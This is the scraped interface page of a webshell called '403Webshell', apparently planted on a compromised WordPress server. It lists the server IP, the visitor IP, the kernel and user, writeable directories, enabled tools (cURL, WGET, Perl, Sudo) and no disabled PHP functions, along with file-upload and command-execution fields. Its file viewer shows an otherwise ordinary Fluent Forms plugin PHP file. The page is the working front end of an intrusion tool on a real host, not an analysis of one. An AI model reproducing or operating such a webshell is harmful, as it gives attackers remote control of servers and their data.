403Webshell
Server IP : 52.25.153.185  /  Your IP : 216.73.217.131
Web Server : Apache
System : Linux ip-172-26-6-158 5.10.0-35-cloud-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
User : daemon ( 1)
PHP Version : 8.1.10
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /bitnami/wordpress/wp-content/plugins/fluentform/app/Modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bitnami/wordpress/wp-content/plugins/fluentform/app/Modules/DocumentationModule.php
<?php

namespace FluentForm\App\Modules;

class DocumentationModule
{
    public function render()
    {
        wp_enqueue_script('fluentform-docs');
        wpFluentForm('view')->render('admin.docs.index', [
            'public_url' => fluentformMix(),
            'icon_path_url' => fluentformMix(''),
            'user_guides'   => $this->getUserGuides(),
        ]);
    }

    private function getUserGuides()
    {
        $guides = [
            [
                'title' => __('Getting started with Fluent Forms', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/getting-started-with-fluent-forms/',
            ],
            [
                'title' => __('Setting up form submission confirmation', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/setup-form-submission-confirmation-message-in-fluent-forms/',
            ],
            [
                'title' => __('Form layout settings', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/form-layout-settings-in-fluent-forms/',
            ],
            [
                'title' => __('Conditional logics', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/set-up-forms-with-conditional-logic-in-fluent-forms/',
            ],
            [
                'title' => __('Managing form submissions', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/managing-entries-in-fluent-forms/',
            ],
            [
                'title' => __('Setting up email notifications', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/how-to-setup-admin-user-email-notifications/',
            ],
            [
                'title' => __('Mailchimp integration', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/how-to-integrate-mailchimp-with-fluent-forms/',
            ],
            [
                'title' => __('Slack integration', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/how-to-integrate-slack-with-fluent-forms/',
            ],
            [
                'title' => __('Form restrictions', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/form-restrictions-feature-in-fluent-forms/',
            ],
            [
                'title' => __('Setup conditional confirmation messages', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/conditional-confirmation-message-in-fluent-forms/',
            ],
            [
                'title' => __('Predefined form fields', 'fluentform'),
                'link'  => 'https://fluentforms.com/docs/general-docs/field-types/',
            ],
        ];
    
        $guides = apply_filters_deprecated(
            'fluentform_user_guide_links',
            [
                $guides
            ],
            FLUENTFORM_FRAMEWORK_UPGRADE,
            'fluentform/user_guide_links',
            'Use fluentform/user_guide_links instead of fluentform_user_guide_links'
        );

        return apply_filters('fluentform/user_guide_links', $guides);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit